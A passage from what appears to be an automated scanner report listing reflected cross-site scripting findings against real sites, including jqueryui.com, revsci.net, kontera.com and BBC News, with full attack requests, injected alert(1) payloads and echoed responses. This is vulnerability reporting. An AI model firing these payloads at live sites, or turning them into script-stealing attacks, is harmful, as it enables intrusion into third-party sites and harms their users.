cityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:31 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222baa37<script>alert(1)</script>5121dc7b14b&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

3.139. http://jqueryui.com/themeroller/css/parseTheme.css.php [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the iconColorHover request parameter is copied into the HTML document as plain text between tags. The payload aa434<script>alert(1)</script>91843ffacb2 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545aa434<script>alert(1)</script>91843ffacb2&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:36 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17319


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545aa434<script>alert(1)</script>91843ffacb2&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select,
...[SNIP]...

3.140. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 857b4<script>alert(1)</script>143bb09ce38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d&857b4<script>alert(1)</script>143bb09ce38=1 HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:37 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17281


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d&857b4<script>alert(1)</script>143bb09ce38=1
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .u
...[SNIP]...

3.141. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload c8ac3<script>alert(1)</script>c5fd9b2ac3b was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J08781c8ac3<script>alert(1)</script>c5fd9b2ac3b HTTP/1.1
Accept: */*
Referer: http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm?3913a'-alert(1)-'50c36c6e4b3=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: js.revsci.net
Cookie: NETID01=b42c2ce4a46b933c2b1575fffbd2dfda; NETSEGS_J08781=0f83b8c41fe7153c&J08781&0&4e3abcd7&0&&4e153a78&8b9d506f0d90683fedb0102e28ef9679; rtc_S22U=...[SNIP]...; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlFtLYIX15H37L0vfkI4WZ6z/OMVWk0/GTVknGMdFGSc/QICq/i+J2xtLh2blA7vzIF3FyETPOfMR4S+jrR0re0Hyl0sudXv3cfzJkUTb5euBfcijqscwfEGxdsf; udm_0=...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Jul 2011 16:58:54 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 19 Jul 2011 16:58:54 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 18 Jul 2011 16:58:53 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J08781C8AC3<SCRIPT>ALERT(1)</SCRIPT>C5FD9B2AC3B" was not recognized.
*/

3.142. http://kona5.kontera.com/KonaGet.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed845"%3balert(1)//3d38fc2e065 was submitted in the l parameter. This input was echoed as ed845";alert(1)//3d38fc2e065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1311016672259&p=114552&k=http%3A//www.redmondpie.com/MOZILLA&al=1&l=http%3A//www.redmondpie.com/ed845"%3balert(1)//3d38fc2e065&t=Redmond+Pie&m1=Microsoft+%2C+Google+%2C+Apple+%2C+Windows+Live+%2C+Yahoo+%2C+Windows+%2C+Vista+%2C+Seven+%2C+Windows+7+%2C+Midori+%2C+Media+Cente&rId=114552_1311016672259_07651635892515772&prev_page=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&rl=0&1=14&mod=19&rm=0&dc_aff_id=&add=FlashVer_?|user_|session_ HTTP/1.1
Host: kona5.kontera.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: KONA_USER_GUID=AF36EB10-B171-11E0-AE06-AA0011BCA603; limps=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 7211
Connection: close

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=114552&layout=adlinks&sId=2087,2170,1417&cb=1311016745&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPag
...[SNIP]...
ere(false,'114552','1');
konaTweakMode=83895315;
konaRequestId="114552_1311016672259_07651635892515772";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.redmondpie.com/ed845";alert(1)//3d38fc2e065&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

3.143. http://kona5.kontera.com/KonaGet.js [rId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ae32"-alert(1)-"bd1c7a3f79c was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1311016672259&p=114552&k=http%3A//www.redmondpie.com/MOZILLA&al=1&l=http%3A//www.redmondpie.com/&t=Redmond+Pie&m1=Microsoft+%2C+Google+%2C+Apple+%2C+Windows+Live+%2C+Yahoo+%2C+Windows+%2C+Vista+%2C+Seven+%2C+Windows+7+%2C+Midori+%2C+Media+Cente&rId=114552_1311016672259_076516358925157727ae32"-alert(1)-"bd1c7a3f79c&prev_page=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&rl=0&1=14&mod=19&rm=0&dc_aff_id=&add=FlashVer_?|user_|session_ HTTP/1.1
Host: kona5.kontera.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: KONA_USER_GUID=AF36EB10-B171-11E0-AE06-AA0011BCA603; limps=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 6783
Connection: close

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=114552&layout=adlinks&sId=2087,2170,1417&cb=1311016747&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPag
...[SNIP]...
iewtimeimp":{"urls":[]}},{"advanced_setting_ad_type_id":{"value":1}}],"campaignId":10005});
teDataHere(false,'114552','1');
konaTweakMode=83895315;
konaRequestId="114552_1311016672259_076516358925157727ae32"-alert(1)-"bd1c7a3f79c";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.redmondpie.com/&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

3.144. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3913a'-alert(1)-'50c36c6e4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/from_our_own_correspondent/9538059.stm?3913a'-alert(1)-'50c36c6e4b3=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:28 GMT
Keep-Alive: timeout=5, max=798
Expires: Mon, 18 Jul 2011 02:19:28 GMT
Connection: close
Content-Length: 65871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955568000,
       editionToServe: 'international',
       queryString: '3913a'-alert(1)-'50c36c6e4b3=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType:
...[SNIP]...

3.145. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6be63'-alert(1)-'34341b078d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm?6be63'-alert(1)-'34341b078d2=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:14 GMT
Keep-Alive: timeout=5, max=800
Expires: Mon, 18 Jul 2011 02:20:14 GMT
Connection: close
Content-Length: 66244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955614000,
       editionToServe: 'international',
       queryString: '6be63'-alert(1)-'34341b078d2=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType:
...[SNIP]...

3.146. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cycling/14179023.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de8b7'-alert(1)-'8f07b21810e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cycling/14179023.stm?de8b7'-alert(1)-'8f07b21810e=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:56 GMT
Keep-Alive: timeout=5, max=781
Expires: Mon, 18 Jul 2011 02:19:56 GMT
Connection: close
Content-Length: 57158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955596000,
       editionToServe: 'international',
       queryString: 'de8b7'-alert(1)-'8f07b21810e=1',
       referrer: null,
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       u
...[SNIP]...

3.147. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/14168601.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ff46'-alert(1)-'6db5909d807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/14168601.stm?6ff46'-alert(1)-'6db5909d807=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:47 GMT
Keep-Alive: timeout=5, max=778
Expires: Mon, 18 Jul 2011 02:19:47 GMT
Connection: close
Content-Length: 50930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955587000,
       editionToServe: 'international',
       queryString: '6ff46'-alert(1)-'6db5909d807=1',
       referrer: null,
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       ur
...[SNIP]...

3.148. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/golf/14178214.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f63'-alert(1)-'818a96bc794 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/golf/14178214.stm?f1f63'-alert(1)-'818a96bc794=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:48 GMT
Keep-Alive: timeout=5, max=707
Expires: Mon, 18 Jul 2011 02:19:48 GMT
Connection: close
Content-Length: 56401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955588000,
       editionToServe: 'international',
       queryString: 'f1f63'-alert(1)-'818a96bc794=1',
       referrer: null,
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/
...[SNIP]...

3.149. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/motogp/14177052.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bb38'-alert(1)-'e4c57ec748a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/motogp/14177052.stm?8bb38'-alert(1)-'e4c57ec748a=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:53 GMT
Keep-Alive: timeout=5, max=788
Expires: Mon, 18 Jul 2011 02:19:53 GMT
Connection: close
Content-Length: 53436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955593000,
       editionToServe: 'international',
       queryString: '8bb38'-alert(1)-'e4c57ec748a=1',
       referrer: null,
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
   
...[SNIP]...

3.150. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afea3'-alert(1)-'0f35a49d629 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

